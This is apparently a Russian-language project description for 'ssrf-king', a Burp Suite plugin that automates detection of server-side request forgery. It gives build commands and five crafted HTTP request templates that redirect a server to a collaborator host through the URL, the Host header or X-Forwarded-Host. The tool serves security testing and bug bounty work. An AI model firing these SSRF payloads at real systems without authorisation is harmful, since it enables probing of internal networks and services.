
SSRF плагин для burp автоматизирует обнаружение SSRF во всех запросах
Плагин SSRF для Burp, который автоматизирует обнаружение SSRF во всех запросах.
![]()
Если вы столкнулись с какими-либо проблемами или хотите получить новую функцию, которая не перечислена ниже Пожалуйста, создайте новый issue по этой форме
git clone https://github.com/ethicalhackingplayground/ssrf-kinggradle buildОн также выполняет следующие тесты на основе этого исследования:
Ссылка:
GET http://burpcollab/some/endpoint HTTP/1.1
Host: example.com
...
and
GET @burpcollab/some/endpoint HTTP/1.1
Host: example.com
...
and
GET /some/endpoint HTTP/1.1
Host: example.com:80@burpcollab
...
and
GET /some/endpoint HTTP/1.1
Host: burpcollab
...
and
GET /some/endpoint HTTP/1.1
Host: example.com
X-Forwarded-Host: burpcollab
...






Начиная с этого момента вы будете фаззить параметр для тестирования SSRF.

Если вы получите вознаграждение (bounty), пожалуйста, поддержите меня, купив мне кофе